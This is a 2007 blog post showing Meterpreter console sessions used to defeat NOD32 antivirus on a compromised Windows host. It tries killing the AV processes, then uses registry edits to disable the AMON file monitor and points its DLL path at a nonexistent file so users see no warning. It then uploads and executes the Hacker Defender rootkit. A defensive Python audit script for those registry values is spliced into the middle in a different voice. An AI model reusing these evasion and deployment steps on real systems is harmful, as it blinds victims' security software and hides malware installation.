Friday, June 29, 2007

Defeating NOD32 AV


OK, I am going to claim victory over NOD32, but only on a technicality. But hey, I ain't proud, I'll take it.

So if you upload any malware, NOD32, like a good AV, will give you an alert (that's good), and the file is gone by the time you list the directory:

meterpreter > upload hxdef100.exe hxdef100.exe
[*] uploading : hxdef100.exe -> hxdef100.exe
[*] uploaded : hxdef100.exe -> hxdef100.exe
meterpreter > ls

Listing: C:\WINDOWS\help\hxdef
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 .
40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 ..



[Screenshot: NOD32 AV alerting on Hacker Defender]

NOD32 has srvhost restart its process immediately if you kill it, which is a real bummer. It makes no difference whether you use the killav script:

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off nod32kui.exe...
[*] Killing off nod32krn.exe...

or kill the process by hand after finding it with ps (note that nod32krn.exe is back in the second listing under a new PID):

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
372 smss.exe \SystemRoot\System32\smss.exe
588 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
664 services.exe C:\WINDOWS\system32\services.exe
676 lsass.exe C:\WINDOWS\system32\lsass.exe
840 svchost.exe C:\WINDOWS\system32\svchost.exe
948 svchost.exe C:\WINDOWS\System32\svchost.exe
1128 svchost.exe C:\WINDOWS\System32\svchost.exe
1152 svchost.exe C:\WINDOWS\System32\svchost.exe
1332 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1616 Explorer.EXE C:\WINDOWS\Explorer.EXE
1760 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1768 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
1852 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
1892 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1920 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
312 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
2088 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

meterpreter > kill 2088
Killing: 2088

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
348 smss.exe \SystemRoot\System32\smss.exe
580 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
604 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
656 services.exe C:\WINDOWS\system32\services.exe
668 lsass.exe C:\WINDOWS\system32\lsass.exe
832 svchost.exe C:\WINDOWS\system32\svchost.exe
940 svchost.exe C:\WINDOWS\System32\svchost.exe
1116 svchost.exe C:\WINDOWS\System32\svchost.exe
1168 svchost.exe C:\WINDOWS\System32\svchost.exe
1324 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1616 Explorer.EXE C:\WINDOWS\Explorer.EXE
1724 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1736 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
1792 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
1916 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1944 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
288 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
3880 nod32krn.exe C:\Program Files\Eset\nod32krn.exe
1568 cmd.exe C:\WINDOWS\system32\cmd.exe
2404 regedit.exe C:\WINDOWS\regedit.exe


So how do we get malware on the box without alerting the user? And more specifically, how do we get by "AMON", which is the file monitor process?

[Screenshot: NOD32 AV AMON file protection]

I found that by editing some registry keys we can turn off the file protection. Meterpreter's reg command does everything we need:


meterpreter > reg
Usage: reg [command] [options]

Interact with the target machine's registry.

OPTIONS:

-d The data to store in the registry value.
-h Help menu.
-k The registry key path (E.g. HKLM\Software\Foo).
-t The registry value type (E.g. REG_SZ).
-v The registry value name (E.g. Stuff).

COMMANDS:

enumkey Enumerate the supplied registry key [-k <key>]
createkey Create the supplied registry key [-k <key>]
deletekey Delete the supplied registry key [-k <key>]
setval Set a registry value [-k <key> -v <val> -d <data>]
deleteval Delete the supplied registry value [-k <key> -v <val>]
queryval Queries the data contents of a value [-k <key> -v <val>]

meterpreter > reg enumkey -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings
Enumerating: HKLM\Software\eset\nod\currentversion\modules\AMON\settings\Config000\Settings

Values (23):

SP
enabled
check_on_open
check_on_rename
check_on_execute
check_on_create
quarantine_on_create
cache_enable
media_floppies
media_network
media_local
boot_on_access
boot_on_shutdown
sec_clean
sec_delete
sec_rename
sec_exclude
sec_replace
manualstop_enabled
autorun_dynamic
autoupd_notify
exc
exc_num

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings -v enabled
Key: HKLM\Software\eset\nod\currentversion\modules\AMON\settings\Config000\Settings
Name: enabled
Type: REG_DWORD
Data: 1

meterpreter > reg setval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings -v enabled -d 0
Successful set enabled.

meterpreter > reg queryval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v start
Key: HKLM\SYSTEM\CurrentControlSet\Services\AMON
Name: start
Type: REG_DWORD
Data: 2

meterpreter > reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v start -t REG_DWORD -d "3"
Successful set start.

meterpreter > reg queryval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v start
Key: HKLM\SYSTEM\CurrentControlSet\Services\AMON
Name: start
Type: REG_DWORD
Data: 3


But if you disable AMON this way, the icon in the taskbar turns red and AMON is grayed out in the AV's control center (that's no good).

So to prevent that, we can change the registry value that tells NOD32 where the AMON DLL lives. We point it at a file that does not exist; when NOD32 can't find the library it quietly loads the rest of its modules and gives the user no indication that anything is wrong. If you go looking for the AMON service you won't see it, but if you aren't looking for it you probably won't notice a problem.

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filename
Key: HKLM\Software\eset\nod\currentversion\modules\AMON
Name: filename
Type: REG_SZ
Data: C:\Program Files\Eset\ps_amon.dll

meterpreter > reg setval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filename -t REG_SZ -d "C:\\Program Files\\Eset\\ps_amon1.dll"
Successful set filename.

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filename
Key: HKLM\Software\eset\nod\currentversion\modules\AMON
Name: filename
Type: REG_SZ
Data: C:\Program Files\Eset\ps_amon1.dll
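For anyone on the defending side, the three values touched above (the AMON enabled flag, the AMON service start type, and the module filename) are exactly what an integrity check should watch, and the "point it at a DLL that doesn't exist" trick is only invisible if nobody compares the configured path against the disk. The following is an added example, not code from the post or from Eset: it parses reg queryval output in the format shown above into a snapshot and audits it against the healthy state. The key and value names come from the post; the healthy start type (2, automatic) and DLL path are taken from the "before" output; the snapshot format, the Finding class, and the injected file_exists callback are my assumptions so the check runs offline.

```python
"""Audit the NOD32 AMON registry values quoted in the post for tampering.

Added example (not from the post or from Eset). Key and value names
are the ones the post shows; the snapshot layout and helper names are
assumptions chosen so this runs on any platform without a registry.
"""
import re
from dataclasses import dataclass
from typing import Callable

# Registry locations quoted in the post (NOD32 v2-era layout).
AMON_SETTINGS = r"HKLM\Software\eset\nod\currentversion\modules\AMON\settings\Config000\Settings"
AMON_MODULE = r"HKLM\Software\eset\nod\currentversion\modules\AMON"
AMON_SERVICE = r"HKLM\SYSTEM\CurrentControlSet\Services\AMON"

# Win32 service start types stored in Services\<name>\Start.
SERVICE_AUTO_START = 2    # value the post shows before tampering
SERVICE_DEMAND_START = 3  # value the post sets (manual start)


@dataclass(frozen=True)
class Finding:
    key: str
    value: str
    observed: object
    expected: str


# One 'reg queryval' result block: Key / Name / Type / Data on four lines.
_QUERYVAL = re.compile(
    r"Key:\s*(?P<key>\S+)\s*Name:\s*(?P<name>\S+)\s*"
    r"Type:\s*(?P<type>REG_\w+)\s*Data:\s*(?P<data>.*)"
)


def parse_queryval(text: str) -> dict:
    """Turn one or more 'reg queryval' outputs into {key: {name: data}}.

    Keys and value names are lower-cased because the registry is
    case-insensitive; REG_DWORD data becomes an int, the rest stays text.
    """
    snapshot: dict = {}
    for m in _QUERYVAL.finditer(text):
        data = m.group("data").strip()
        if m.group("type") == "REG_DWORD":
            data = int(data)
        snapshot.setdefault(m.group("key").lower(), {})[m.group("name").lower()] = data
    return snapshot


def audit_amon(snapshot: dict, file_exists: Callable[[str], bool]) -> list:
    """Compare the AMON values with the healthy state and list deviations.

    file_exists is injected so the module-path check works on an offline
    snapshot; on a live host pass os.path.exists.
    """
    findings = []

    enabled = snapshot.get(AMON_SETTINGS.lower(), {}).get("enabled")
    if enabled != 1:
        findings.append(Finding(AMON_SETTINGS, "enabled", enabled, "1 (file protection on)"))

    start = snapshot.get(AMON_SERVICE.lower(), {}).get("start")
    if start != SERVICE_AUTO_START:
        findings.append(Finding(AMON_SERVICE, "start", start, f"{SERVICE_AUTO_START} (automatic start)"))

    # The quiet-failure trick: the value looks sane, but the file is missing.
    filename = snapshot.get(AMON_MODULE.lower(), {}).get("filename")
    if not filename or not file_exists(filename):
        findings.append(Finding(AMON_MODULE, "filename", filename, "path to an existing ps_amon.dll"))

    return findings


# Constructed sample input: the queryval outputs as they appear in the post,
# before (HEALTHY) and after (TAMPERED) the registry edits.
HEALTHY = r"""
Key: HKLM\Software\eset\nod\currentversion\modules\AMON\settings\Config000\Settings
Name: enabled
Type: REG_DWORD
Data: 1

Key: HKLM\SYSTEM\CurrentControlSet\Services\AMON
Name: start
Type: REG_DWORD
Data: 2

Key: HKLM\Software\eset\nod\currentversion\modules\AMON
Name: filename
Type: REG_SZ
Data: C:\Program Files\Eset\ps_amon.dll
"""

TAMPERED = HEALTHY.replace("Data: 1", "Data: 0").replace("Data: 2", "Data: 3") \
                  .replace("ps_amon.dll", "ps_amon1.dll")

# Constructed stand-in for the target's disk: only the genuine DLL exists.
PRESENT_FILES = {r"c:\program files\eset\ps_amon.dll"}


def fake_file_exists(path: str) -> bool:
    return path.lower() in PRESENT_FILES


if __name__ == "__main__":
    for label, text in (("healthy", HEALTHY), ("tampered", TAMPERED)):
        for f in audit_amon(parse_queryval(text), fake_file_exists):
            print(f"[{label}] {f.key}\\{f.value}: observed {f.observed!r}, expected {f.expected}")
```

Run on the page's own values, the healthy snapshot produces no findings and the tampered one produces three, including the renamed-DLL case that the AV's own UI never reports. On a real host you would feed it live values read with winreg instead of parsed console output, and the same logic generalises to any product that locates its protection modules through a registry path.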



meterpreter > upload hxdef100.exe hxdef100.exe
[*] uploading : hxdef100.exe -> hxdef100.exe
[*] uploaded : hxdef100.exe -> hxdef100.exe
meterpreter > upload hxdef100.ini hxdef100.ini
[*] uploading : hxdef100.ini -> hxdef100.ini
[*] uploaded : hxdef100.ini -> hxdef100.ini
meterpreter > execute -f hxdef100.exe
Process 204 created.

All done :-)
CG

1 comment:

Anonymous said...

As far as I can see the thing you did requires restart :) why don't you try
without restart ?

mmimmi@abv.bg